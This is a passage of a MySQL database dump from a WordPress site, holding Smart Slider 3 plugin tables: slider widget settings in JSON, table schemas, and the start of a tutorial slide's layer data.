middle;\\\"},{\\\"color\\\":\\\"fc2828ff\\\",\\\"afont\\\":\\\"Raleway,Arial\\\",\\\"size\\\":\\\"25||px\\\"},{}]}\",\"widget-bar-slide-count\":\"0\",\"widget-bar-width\":\"100%\",\"widget-bar-full-width\":\"0\",\"widget-bar-separator\":\" - \",\"widget-bar-align\":\"center\",\"widget-bar-display-hover\":\"0\",\"widget-bar-display-mobileportrait\":\"1\",\"widget-bar-display-mobilelandscape\":\"1\",\"widget-bar-display-tabletportrait\":\"1\",\"widget-bar-display-tabletlandscape\":\"1\",\"widget-bar-display-desktopportrait\":\"1\",\"widget-bar-display-desktoplandscape\":\"1\",\"widget-bar-exclude-slides\":\"\",\"widget-thumbnail-enabled\":\"0\",\"widgetthumbnail\":\"default\",\"widget-thumbnail-show-image\":\"1\",\"widget-thumbnail-width\":\"100\",\"widget-thumbnail-height\":\"60\",\"widget-thumbnail-position-mode\":\"simple\",\"widget-thumbnail-position-area\":\"12\",\"widget-thumbnail-position-stack\":\"1\",\"widget-thumbnail-position-offset\":\"0\",\"widget-thumbnail-position-horizontal\":\"left\",\"widget-thumbnail-position-horizontal-position\":\"0\",\"widget-thumbnail-position-horizontal-unit\":\"px\",\"widget-thumbnail-position-vertical\":\"top\",\"widget-thumbnail-position-vertical-position\":\"0\",\"widget-thumbnail-position-vertical-unit\":\"px\",\"widget-thumbnail-action\":\"click\",\"widget-thumbnail-align-content\":\"start\",\"widget-thumbnail-style-bar\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"242424ff\\\",\\\"padding\\\":\\\"3|*|3|*|3|*|3|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"0\\\",\\\"extra\\\":\\\"\\\"}]}\",\"widget-thumbnail-style-slides\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"00000000\\\",\\\"padding\\\":\\\"0|*|0|*|0|*|0|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|ffffff00\\\",\\\"borderradius\\\":\\\"0\\\",\\\"opacity\\\":\\\"40\\\",\\\"extra\\\":\\\"margin: 3px;\\ntransition: all 0.4s;\\nbackground-size: cover;\\\"},{\\\"border\\\":\\\"0|*|solid|*|ffffffcc\\\",\\\"opacity\\\":\\\"100\\\",\\\"extra\\\":\\\"\\\"}]}\",\"widget-thumbnail-title-style\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"000000ab\\\",\\\"padding\\\":\\\"3|*|10|*|3|*|10|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"0\\\",\\\"extra\\\":\\\"bottom: 0;\\nleft: 0;\\\"}]}\",\"widget-thumbnail-title\":\"0\",\"widget-thumbnail-title-font\":\"{\\\"data\\\":[{\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"12||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ab\\\",\\\"afont\\\":\\\"Montserrat\\\",\\\"lineheight\\\":\\\"1.2\\\",\\\"bold\\\":0,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"left\\\"},{\\\"color\\\":\\\"fc2828ff\\\",\\\"afont\\\":\\\"google(@import url(http://fonts.googleapis.com/css?family=Raleway);),Arial\\\",\\\"size\\\":\\\"25||px\\\"},{}]}\",\"widget-thumbnail-description\":\"0\",\"widget-thumbnail-description-font\":\"{\\\"data\\\":[{\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"12||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ab\\\",\\\"afont\\\":\\\"Montserrat\\\",\\\"lineheight\\\":\\\"1.3\\\",\\\"bold\\\":0,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"left\\\"},{\\\"color\\\":\\\"fc2828ff\\\",\\\"afont\\\":\\\"google(@import url(http://fonts.googleapis.com/css?family=Raleway);),Arial\\\",\\\"size\\\":\\\"25||px\\\"},{}]}\",\"widget-thumbnail-caption-placement\":\"overlay\",\"widget-thumbnail-caption-size\":\"100\",\"widget-thumbnail-arrow\":\"1\",\"widget-thumbnail-arrow-width\":\"26\",\"widget-thumbnail-arrow-offset\":\"0\",\"widget-thumbnail-arrow-prev-alt\":\"previous arrow\",\"widget-thumbnail-arrow-next-alt\":\"next arrow\",\"widget-thumbnail-arrow-image\":\"\",\"widget-thumbnail-group\":\"1\",\"widget-thumbnail-invert-group-direction\":\"0\",\"widget-thumbnail-orientation\":\"auto\",\"widget-thumbnail-size\":\"100%\",\"widget-thumbnail-display-hover\":\"0\",\"widget-thumbnail-display-mobileportrait\":\"1\",\"widget-thumbnail-display-mobilelandscape\":\"1\",\"widget-thumbnail-display-tabletportrait\":\"1\",\"widget-thumbnail-display-tabletlandscape\":\"1\",\"widget-thumbnail-display-desktopportrait\":\"1\",\"widget-thumbnail-display-desktoplandscape\":\"1\",\"widget-thumbnail-exclude-slides\":\"\",\"widget-shadow-enabled\":\"0\",\"widgetshadow\":\"shadow\",\"widget-shadow-shadow\":\"dark.png\",\"widget-shadow-shadow-image\":\"\",\"widget-shadow-width\":\"100%\",\"widget-shadow-display-mobileportrait\":\"1\",\"widget-shadow-display-mobilelandscape\":\"1\",\"widget-shadow-display-tabletportrait\":\"1\",\"widget-shadow-display-tabletlandscape\":\"1\",\"widget-shadow-display-desktopportrait\":\"1\",\"widget-shadow-display-desktoplandscape\":\"1\",\"widget-shadow-exclude-slides\":\"\",\"widget-fullscreen-enabled\":\"0\",\"widgetfullscreen\":\"image\",\"widget-fullscreen-tonormal\":\"full1.svg\",\"widget-fullscreen-tonormal-image\":\"\",\"widget-fullscreen-tonormal-color\":\"ffffffcc\",\"widget-fullscreen-mirror\":\"1\",\"widget-fullscreen-tofull\":\"full1.svg\",\"widget-fullscreen-tofull-image\":\"\",\"widget-fullscreen-tofull-color\":\"ffffffcc\",\"widget-fullscreen-style\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"000000ab\\\",\\\"padding\\\":\\\"10|*|10|*|10|*|10|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"3\\\",\\\"extra\\\":\\\"\\\"},{\\\"backgroundcolor\\\":\\\"000000ab\\\"}]}\",\"widget-fullscreen-position-mode\":\"simple\",\"widget-fullscreen-position-area\":\"4\",\"widget-fullscreen-position-stack\":\"1\",\"widget-fullscreen-position-offset\":\"15\",\"widget-fullscreen-position-horizontal\":\"left\",\"widget-fullscreen-position-horizontal-position\":\"0\",\"widget-fullscreen-position-horizontal-unit\":\"px\",\"widget-fullscreen-position-vertical\":\"top\",\"widget-fullscreen-position-vertical-position\":\"0\",\"widget-fullscreen-position-vertical-unit\":\"px\",\"widget-fullscreen-responsive-desktop\":\"1\",\"widget-fullscreen-responsive-tablet\":\"0.7\",\"widget-fullscreen-responsive-mobile\":\"0.5\",\"widget-fullscreen-display-hover\":\"0\",\"widget-fullscreen-display-mobileportrait\":\"1\",\"widget-fullscreen-display-mobilelandscape\":\"1\",\"widget-fullscreen-display-tabletportrait\":\"1\",\"widget-fullscreen-display-tabletlandscape\":\"1\",\"widget-fullscreen-display-desktopportrait\":\"1\",\"widget-fullscreen-display-desktoplandscape\":\"1\",\"widget-fullscreen-exclude-slides\":\"\",\"widget-html-enabled\":\"0\",\"widgethtml\":\"html\",\"widget-html-position-mode\":\"simple\",\"widget-html-position-area\":\"2\",\"widget-html-position-stack\":\"1\",\"widget-html-position-offset\":\"0\",\"widget-html-position-horizontal\":\"left\",\"widget-html-position-horizontal-position\":\"0\",\"widget-html-position-horizontal-unit\":\"px\",\"widget-html-position-vertical\":\"top\",\"widget-html-position-vertical-position\":\"0\",\"widget-html-position-vertical-unit\":\"px\",\"widget-html-code\":\"\",\"widget-html-display-hover\":\"0\",\"widget-html-display-mobileportrait\":\"1\",\"widget-html-display-mobilelandscape\":\"1\",\"widget-html-display-tabletportrait\":\"1\",\"widget-html-display-tabletlandscape\":\"1\",\"widget-html-display-desktopportrait\":\"1\",\"widget-html-display-desktoplandscape\":\"1\",\"widget-html-exclude-slides\":\"\",\"animation\":\"fade\",\"animation-duration\":\"500\",\"animation-delay\":\"0\",\"animation-easing\":\"easeOutQuad\",\"carousel\":\"1\",\"background-animation\":\"\",\"background-animation-color\":\"333333ff\",\"background-animation-speed\":\"normal\",\"animation-shifted-background-animation\":\"auto\",\"kenburns-animation\":\"50|*|50|*|\",\"kenburns-animation-speed\":\"default\",\"kenburns-animation-strength\":\"default\",\"shape-divider\":\"\",\"particle\":\"\",\"playfirstlayer\":\"1\",\"playonce\":\"0\",\"layer-animation-play-in\":\"end\",\"layer-animation-play-mode\":\"skippable\",\"parallax-enabled\":\"1\",\"parallax-enabled-mobile\":\"0\",\"parallax-3d\":\"0\",\"parallax-animate\":\"1\",\"parallax-horizontal\":\"mouse\",\"parallax-vertical\":\"mouse\",\"parallax-mouse-origin\":\"slider\",\"parallax-scroll-move\":\"both\",\"autoplay\":\"0\",\"autoplayDuration\":\"8000\",\"autoplayStart\":\"1\",\"autoplayAllowReStart\":\"0\",\"autoplayLoop\":\"1\",\"autoplayfinish\":\"1|*|loop|*|current\",\"loop-single-slide\":\"0\",\"autoplayStopClick\":\"1\",\"autoplayStopMouse\":\"0\",\"autoplayStopMedia\":\"1\",\"autoplayResumeClick\":\"0\",\"autoplayResumeMouse\":\"0\",\"autoplayResumeMedia\":\"1\",\"widget-autoplay-enabled\":\"0\",\"widgetautoplay\":\"image\",\"widget-autoplay-play\":\"small-light.svg\",\"widget-autoplay-play-image\":\"\",\"widget-autoplay-play-color\":\"ffffffcc\",\"widget-autoplay-style\":\"{\\\"data\\\":[{\\\"backgroundcolor\\\":\\\"000000ab\\\",\\\"padding\\\":\\\"10|*|10|*|10|*|10|*|px\\\",\\\"boxshadow\\\":\\\"0|*|0|*|0|*|0|*|000000ff\\\",\\\"border\\\":\\\"0|*|solid|*|000000ff\\\",\\\"borderradius\\\":\\\"3\\\",\\\"extra\\\":\\\"\\\"},{\\\"backgroundcolor\\\":\\\"000000ab\\\"}]}\",\"widget-autoplay-mirror\":\"1\",\"widget-autoplay-pause\":\"small-light.svg\",\"widget-autoplay-pause-image\":\"\",\"widget-autoplay-pause-color\":\"ffffffcc\",\"widget-autoplay-responsive-desktop\":\"1\",\"widget-autoplay-responsive-tablet\":\"0.7\",\"widget-autoplay-responsive-mobile\":\"0.5\",\"widget-autoplay-position-mode\":\"simple\",\"widget-autoplay-position-area\":\"4\",\"widget-autoplay-position-stack\":\"1\",\"widget-autoplay-position-offset\":\"15\",\"widget-autoplay-position-horizontal\":\"left\",\"widget-autoplay-position-horizontal-position\":\"0\",\"widget-autoplay-position-horizontal-unit\":\"px\",\"widget-autoplay-position-vertical\":\"top\",\"widget-autoplay-position-vertical-position\":\"0\",\"widget-autoplay-position-vertical-unit\":\"px\",\"widget-autoplay-display-hover\":\"0\",\"widget-autoplay-display-mobileportrait\":\"1\",\"widget-autoplay-display-mobilelandscape\":\"1\",\"widget-autoplay-display-tabletportrait\":\"1\",\"widget-autoplay-display-tabletlandscape\":\"1\",\"widget-autoplay-display-desktopportrait\":\"1\",\"widget-autoplay-display-desktoplandscape\":\"1\",\"widget-autoplay-exclude-slides\":\"\",\"widget-indicator-enabled\":\"0\",\"widgetindicator\":\"pie\",\"widget-indicator-position-mode\":\"simple\",\"widget-indicator-position-area\":\"4\",\"widget-indicator-position-stack\":\"1\",\"widget-indicator-position-offset\":\"15\",\"widget-indicator-position-horizontal\":\"left\",\"widget-indicator-position-horizontal-position\":\"0\",\"widget-indicator-position-horizontal-unit\":\"px\",\"widget-indicator-position-vertical\":\"top\",\"widget-indicator-position-vertical-position\":\"0\",\"widget-indicator-position-vertical-unit\":\"px\",\"widget-indicator-size\":\"25\",\"widget-indicator-thickness\":\"30\",\"widget-indicator-track\":\"000000ab\",\"widget-indicator-bar\":\"ffffffff\",\"widget-indicator-style\":\"\",\"widget-indicator-display-hover\":\"0\",\"widget-indicator-display-mobileportrait\":\"1\",\"widget-indicator-display-mobilelandscape\":\"1\",\"widget-indicator-display-tabletportrait\":\"1\",\"widget-indicator-display-tabletlandscape\":\"1\",\"widget-indicator-display-desktopportrait\":\"1\",\"widget-indicator-display-desktoplandscape\":\"1\",\"widget-indicator-exclude-slides\":\"\",\"imageload\":\"0\",\"imageloadNeighborSlides\":\"0\",\"optimize-scale\":\"0\",\"optimize-quality\":\"70\",\"optimize-thumbnail-scale\":\"0\",\"optimize-thumbnail-quality\":\"70\",\"optimize-slide-width-normal\":\"1920\",\"optimizeThumbnailWidth\":\"100\",\"optimizeThumbnailHeight\":\"60\",\"layer-image-optimize\":\"0\",\"layer-image-width-tablet\":\"800\",\"layer-image-width-mobile\":\"425\",\"layer-image-base64\":\"0\",\"layer-image-base64-size\":\"50\",\"slides-background-video-mobile\":\"1\",\"playWhenVisible\":\"1\",\"playWhenVisibleAt\":\"50\",\"dependency\":\"\",\"delay\":\"0\",\"is-delayed\":\"0\",\"backgroundMode\":\"fill\",\"slide-css\":\"\",\"randomize\":\"0\",\"randomizeFirst\":\"0\",\"randomize-cache\":\"1\",\"variations\":\"5\",\"reverse-slides\":\"0\",\"maximumslidecount\":\"1000\",\"maintain-session\":\"0\",\"global-lightbox\":\"0\",\"global-lightbox-label\":\"0\",\"slide-background-parallax\":\"0\",\"slide-background-parallax-strength\":\"50\",\"bg-parallax-tablet\":\"0\",\"bg-parallax-mobile\":\"0\",\"blockrightclick\":\"0\",\"controlsBlockCarouselInteraction\":\"1\",\"clear-both\":\"1\",\"clear-both-after\":\"1\",\"overflow-hidden-page\":\"0\",\"responsiveFocusUser\":\"1\",\"responsiveFocusEdge\":\"auto\",\"classes\":\"\",\"custom-css-codes\":\"\",\"callbacks\":\"\",\"related-posts\":\"\"}','published','2020-02-25 13:53:41','https://smartslider3.com/wp-content/uploads/slider404/tutorialsliderthumbnail-1.png',0);
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_sliders` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nextend2_smartslider3_sliders_xref`
--

DROP TABLE IF EXISTS `wp_nextend2_smartslider3_sliders_xref`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_nextend2_smartslider3_sliders_xref` (
  `group_id` int(11) NOT NULL,
  `slider_id` int(11) NOT NULL,
  `ordering` int(11) NOT NULL DEFAULT 0,
  PRIMARY KEY (`group_id`,`slider_id`),
  KEY `ordering` (`ordering`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nextend2_smartslider3_sliders_xref`
--

LOCK TABLES `wp_nextend2_smartslider3_sliders_xref` WRITE;
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_sliders_xref` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_sliders_xref` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wp_nextend2_smartslider3_slides`
--

DROP TABLE IF EXISTS `wp_nextend2_smartslider3_slides`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8mb4 */;
CREATE TABLE `wp_nextend2_smartslider3_slides` (
  `id` int(11) NOT NULL AUTO_INCREMENT,
  `title` text DEFAULT NULL,
  `slider` int(11) NOT NULL,
  `publish_up` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  `publish_down` datetime NOT NULL DEFAULT '1970-01-01 00:00:00',
  `published` tinyint(1) NOT NULL,
  `first` int(11) NOT NULL,
  `slide` longtext DEFAULT NULL,
  `description` text NOT NULL,
  `thumbnail` text DEFAULT NULL,
  `params` text NOT NULL,
  `ordering` int(11) NOT NULL,
  `generator_id` int(11) NOT NULL,
  PRIMARY KEY (`id`),
  KEY `published` (`published`),
  KEY `publish_up` (`publish_up`),
  KEY `publish_down` (`publish_down`),
  KEY `generator_id` (`generator_id`),
  KEY `ordering` (`ordering`),
  KEY `slider` (`slider`),
  KEY `thumbnail` (`thumbnail`(100))
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wp_nextend2_smartslider3_slides`
--

LOCK TABLES `wp_nextend2_smartslider3_slides` WRITE;
/*!40000 ALTER TABLE `wp_nextend2_smartslider3_slides` DISABLE KEYS */;
INSERT INTO `wp_nextend2_smartslider3_slides` VALUES
(1,'Slide Background',1,'1970-01-01 00:00:00','1970-01-01 00:00:00',1,0,'[{\"type\":\"content\",\"pm\":\"default\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":1120,\"desktopportraitinneralign\":\"inherit\",\"desktopportraitpadding\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitselfalign\":\"center\",\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-IbNOabpfT5aE\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"layers\":[{\"type\":\"row\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitinneralign\":\"inherit\",\"desktopportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"desktopportraitgutter\":0,\"desktopportraitwrapafter\":0,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"tabletportraitgutter\":20,\"mobileportraitpadding\":\"0|*|0|*|0|*|0|*|px\",\"mobileportraitgutter\":20,\"mobileportraitwrapafter\":1,\"mobileportraitmaxwidth\":400,\"mobilelandscapewrapafter\":1,\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-dtwtw9DVCwgQ\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"href\":\"\",\"href-target\":\"_self\",\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"ffffff00\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"borderwidth\":\"1|*|1|*|1|*|1\",\"borderstyle\":\"none\",\"bordercolor\":\"FFFFFFFF\",\"borderradius\":0,\"boxshadow\":\"0|*|0|*|0|*|0|*|00000080\",\"fullwidth\":1,\"stretch\":0,\"name\":\"Row\",\"namesynced\":1,\"cols\":[{\"type\":\"col\",\"pm\":\"default\",\"desktopportraitfontsize\":100,\"desktopportraitmaxwidth\":0,\"desktopportraitinneralign\":\"left\",\"desktopportraitpadding\":\"10|*|10|*|10|*|10|*|px\",\"desktopportraitorder\":0,\"tabletportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"mobileportraitinneralign\":\"left\",\"mobileportraitpadding\":\"10|*|0|*|10|*|0|*|px\",\"mobileportraitorder\":2,\"opened\":1,\"id\":\"\",\"uniqueclass\":\"n-uc-Fjvyu081qJeK\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"bgimage\":\"\",\"bgimagex\":50,\"bgimagey\":50,\"bgcolor\":\"00000000\",\"bgcolorgradient\":\"off\",\"bgcolorgradientend\":\"00000000\",\"verticalalign\":\"center\",\"colwidth\":\"2/5\",\"href\":\"\",\"href-target\":\"_self\",\"borderradius\":0,\"boxshadow\":\"0|*|0|*|0|*|0|*|00000080\",\"borderwidth\":\"0|*|0|*|0|*|0\",\"borderstyle\":\"solid\",\"bordercolor\":\"ffffffff\",\"name\":\"Column\",\"namesynced\":1,\"layers\":[{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":80,\"mobileportraitfontsize\":60,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Jeans Store Interior\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffff\\\",\\\"size\\\":\\\"36||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.2\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"01. Slide Background\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":80,\"mobileportraitfontsize\":70,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Lorem ipsum dolor sit amet, consect\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffb0\\\",\\\"size\\\":\\\"24||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.3\\\",\\\"weight\\\":300,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"Every slide includes a background, which can be a picture or solid color.\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"20|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":100,\"mobileportraitfontsize\":80,\"mobileportraitmargin\":\"10|*|0|*|0|*|0|*|px\",\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Latest Project\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffdb\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.5\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"1px\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"uppercase\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"Step 1\",\"title\":\"\",\"href\":\"#\",\"href-target\":\"_self\",\"href-rel\":\"\",\"split-text-transform-origin\":\"50|*|50|*|0\",\"split-text-backface-visibility\":\"1\",\"split-text-animation-in\":\"\",\"split-text-delay-in\":\"0\",\"split-text-animation-out\":\"\",\"split-text-delay-out\":\"0\",\"class\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"0|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":90,\"mobileportraitfontsize\":70,\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Text\",\"namesynced\":1,\"item\":{\"type\":\"text\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffb0\\\",\\\"size\\\":\\\"18||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.6\\\",\\\"weight\\\":400,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"normal\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"none\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"},{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"1890d7ff\\\"}]}\",\"style\":\"\",\"content\":\"To change the background click on the label bar and in the layer window select the style tab.\",\"content-tablet-enabled\":\"0\",\"contenttablet\":\"\",\"content-mobile-enabled\":\"0\",\"contentmobile\":\"\"}}},{\"type\":\"layer\",\"pm\":\"normal\",\"desktopportraitfontsize\":100,\"desktopportraitmargin\":\"20|*|0|*|0|*|0|*|px\",\"desktopportraitheight\":0,\"desktopportraitmaxwidth\":0,\"desktopportraitselfalign\":\"inherit\",\"tabletportraitfontsize\":100,\"mobileportraitfontsize\":80,\"mobileportraitmargin\":\"10|*|0|*|0|*|0|*|px\",\"id\":\"\",\"uniqueclass\":\"\",\"generatorvisible\":\"\",\"zindex\":2,\"class\":\"\",\"crop\":\"visible\",\"rotation\":0,\"parallax\":0,\"desktopportrait\":1,\"desktoplandscape\":1,\"tabletportrait\":1,\"tabletlandscape\":1,\"mobileportrait\":1,\"mobilelandscape\":1,\"name\":\"Latest Project\",\"namesynced\":1,\"item\":{\"type\":\"heading\",\"values\":{\"font\":\"{\\\"data\\\":[{\\\"extra\\\":\\\"\\\",\\\"color\\\":\\\"ffffffdb\\\",\\\"size\\\":\\\"14||px\\\",\\\"tshadow\\\":\\\"0|*|0|*|0|*|000000ff\\\",\\\"afont\\\":\\\"Roboto\\\",\\\"lineheight\\\":\\\"1.5\\\",\\\"weight\\\":1,\\\"italic\\\":0,\\\"underline\\\":0,\\\"align\\\":\\\"inherit\\\",\\\"letterspacing\\\":\\\"1px\\\",\\\"wordspacing\\\":\\\"normal\\\",\\\"texttransform\\\":\\\"uppercase\\\"},{\\\"extra\\\":\\\"\\\"}]}\",\"style\":\"\",\"priority\":\"div\",\"fullwidth\":\"1\",\"nowrap\":\"0\",\"heading\":\"Step 